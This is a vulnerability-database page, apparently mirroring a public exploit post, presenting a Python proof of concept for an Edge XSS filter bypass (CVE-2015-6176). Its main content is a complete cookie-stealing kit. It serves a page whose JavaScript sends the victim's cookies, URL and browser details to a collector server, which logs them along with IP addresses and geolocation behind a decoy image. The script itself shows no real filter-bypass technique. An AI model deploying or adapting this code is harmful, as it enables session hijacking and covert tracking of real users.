Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Microsoft Edge Cross Site Scripting Filter Bypass

🗓️ 22 Jul 2025 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstorm.news👁 92 Views

Demonstrates Edge XSS filter bypass PoC that steals cookies and logs user data.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2015-6176
23 Jul 202521:02
circl
CNVD		Microsoft Edge XSS Filter Bypass Vulnerability
9 Dec 201500:00
cnvd
CVE		CVE-2015-6176
9 Dec 201511:00
cve
Cvelist		CVE-2015-6176
9 Dec 201511:00
cvelist
Exploit DB		Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
22 Jul 202500:00
exploitdb
EUVD		EUVD-2015-6119
7 Oct 202500:30
euvd
Microsoft KB		MS15-125: Cumulative Security Update for Microsoft Edge: December 8, 2015
8 Dec 201500:00
mskb
Kaspersky		KLA10720 Multiple vulnerabilities in Microsoft Internet Explorer & Edge
8 Dec 201500:00
kaspersky
NVD		CVE-2015-6176
9 Dec 201511:59
nvd
OpenVAS		Microsoft Edge Multiple Vulnerabilities (3116184)
5 Jan 201600:00
openvas
Rows per page
# Titles: Microsoft Edge XSS Filter Bypass PoC
    # Author: nu11secur1ty
    # Date: 2025-07-18
    # Vendor: Microsoft
    # Software: Microsoft Edge Browser
    # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176
    
    ## Description
    This Proof of Concept (PoC) demonstrates an XSS (Cross-Site Scripting)
    vulnerability bypass in Microsoft Edge's XSS filter. The vulnerability
    allows attackers to inject and execute malicious JavaScript despite Edge's
    built-in XSS protection mechanisms. This PoC works by crafting an HTML page
    that steals user cookies and sends them to an attacker-controlled collector
    server, bypassing Edge's filter. The collector server displays a large sea
    picture as a decoy, while logging stolen cookies, IP addresses, user
    agents, timestamps, and approximate geographic locations.
    This vulnerability is categorized as medium severity due to the potential
    for session hijacking and unauthorized actions performed with stolen
    cookies.
    
    
    # STATUS: MEDIUM VULNERABILITY
    
    [+]Exploit:
    ```pyton
    
    #!/usr/bin/python
    # nu11secur1ty CVE-2015-6176
    
    import http.server
    import socketserver
    import socket
    import threading
    from urllib import parse
    import requests
    import datetime
    
    PORT = 8080
    COLLECTOR_PORT = 9000
    
    # HTML page with extended XSS exploit that sends lots of info via Image GET
    to collector
    HTML_CONTENT = b"""<!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8" />
    <title>XSS Edge Bypass PoC</title>
    <script>
    window.onload = function() {
        try {
            var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
            var cookies = document.cookie || "";
            var url = window.location.href;
            var referrer = document.referrer;
            var language = navigator.language || "";
            var platform = navigator.platform || "";
            var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
    "";
            var screenRes = screen.width + "x" + screen.height;
    
            var data = {
                cookie: cookies,
                url: url,
                referrer: referrer,
                language: language,
                platform: platform,
                timezone: timezone,
                screen: screenRes
            };
    
            var query = Object.keys(data).map(function(k) {
                return encodeURIComponent(k) + "=" +
    encodeURIComponent(data[k]);
            }).join("&");
    
            var img = new Image();
            img.src = attackerServer + "?" + query;
        } catch(e) {
            console.error("Error sending data:", e);
        }
    };
    </script>
    </head>
    <body>
    <h1 style="color:red;">XSS Edge Bypass PoC</h1>
    <p>If this alert appears, XSS is executed.</p>
    </body>
    </html>
    """
    
    # Collector page with large sea picture and centered message (Unicode
    allowed)
    COLLECTOR_PAGE = """<!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8" />
    <title>Collected</title>
    <style>
      body {
        margin: 0;
        background: url('
    https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80')
    no-repeat center center fixed;
        background-size: cover;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        color: white;
        font-family: Arial, sans-serif;
        font-size: 2em;
        text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
      }
    </style>
    </head>
    <body>
    <div>Thank you for visiting the collector page 🌊</div>
    </body>
    </html>
    """
    
    class ExploitHandler(http.server.SimpleHTTPRequestHandler):
        def do_GET(self):
            if self.path in ('/', '/index.html'):
                content = HTML_CONTENT.replace(b"{LOCAL_IP}",
    local_ip.encode()).replace(b"{COLLECTOR_PORT}",
    str(COLLECTOR_PORT).encode())
                self.send_response(200)
                self.send_header("Content-Type", "text/html; charset=utf-8")
                self.send_header("Content-Length", str(len(content)))
                self.end_headers()
                self.wfile.write(content)
            else:
                self.send_error(404)
    
    class CollectorHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            parsed_path = parse.urlparse(self.path)
            if parsed_path.path == "/collect":
                query = parse.parse_qs(parsed_path.query)
    
                cookie = query.get("cookie", [""])[0]
                url = query.get("url", [""])[0]
                referrer = query.get("referrer", [""])[0]
                language = query.get("language", [""])[0]
                platform = query.get("platform", [""])[0]
                timezone = query.get("timezone", [""])[0]
                screen = query.get("screen", [""])[0]
    
                ip = self.client_address[0]
                user_agent = self.headers.get("User-Agent", "Unknown")
                timestamp = datetime.datetime.now().strftime("%Y-%m-%d
    %H:%M:%S")
    
                location = self.get_location(ip)
    
                if cookie:
                    print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f"    URL: {url}")
                print(f"    Referrer: {referrer}")
                print(f"    Language: {language}")
                print(f"    Platform: {platform}")
                print(f"    Timezone: {timezone}")
                print(f"    Screen Resolution: {screen}")
                print(f"    From IP: {ip}")
                print(f"    User-Agent: {user_agent}")
                print(f"    Location: {location}")
                print("-" * 50)
    
                # Save collected info to a file
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f"    URL: {url}\n")
                    f.write(f"    Referrer: {referrer}\n")
                    f.write(f"    Language: {language}\n")
                    f.write(f"    Platform: {platform}\n")
                    f.write(f"    Timezone: {timezone}\n")
                    f.write(f"    Screen Resolution: {screen}\n")
                    f.write(f"    IP: {ip}\n")
                    f.write(f"    User-Agent: {user_agent}\n")
                    f.write(f"    Location: {location}\n")
                    f.write("-" * 50 + "\n")
    
                self.send_response(200)
                self.send_header("Content-Type", "text/html; charset=utf-8")
                content = COLLECTOR_PAGE.encode('utf-8')
                self.send_header("Content-Length", str(len(content)))
                self.end_headers()
                self.wfile.write(content)
            else:
                self.send_error(404)
    
        def get_location(self, ip):
            # Use free IP info service; fallback gracefully if no internet
            try:
                resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
                if resp.status_code == 200:
                    data = resp.json()
                    city = data.get("city", "")
                    region = data.get("region", "")
                    country = data.get("country", "")
                    loc = data.get("loc", "")
                    return f"{city}, {region}, {country} (coords: {loc})"
            except Exception:
                pass
            return "Location lookup failed or unavailable"
    
    def get_local_ip():
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            ip = s.getsockname()[0]
        except Exception:
            ip = "127.0.0.1"
        finally:
            s.close()
        return ip
    
    def run_exploit_server():
        with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
            print(f"[*] Exploit server running at: http://
    {local_ip}:{PORT}/index.html")
            httpd.serve_forever()
    
    def run_collector_server():
        with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as
    httpd:
            print(f"[*] Collector server listening for stolen cookies at:
    http://{local_ip}:{COLLECTOR_PORT}/collect")
            httpd.serve_forever()
    
    if __name__ == "__main__":
        local_ip = get_local_ip()
        try:
            print(f"[*] Your server IP is: {local_ip}")
            exploit_thread = threading.Thread(target=run_exploit_server,
    daemon=True)
            exploit_thread.start()
    
            run_collector_server()
        except KeyboardInterrupt:
            print("\n[!] Shutting down servers. Goodbye!")
    
    ```
    
    # Video:
    [href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
    
    # Source:
    [href](
    https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
    
    # Buy me a coffee if you are not ashamed:
    [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
    
    
    # Time spent:
    03:35:00

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jul 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
EPSS0.04304
Microsoft EdgeCross Site ScriptingFilter bypassProof of ConceptCVE 2015 6176Cookies theftCollector serverUser data loggingMedium severity
92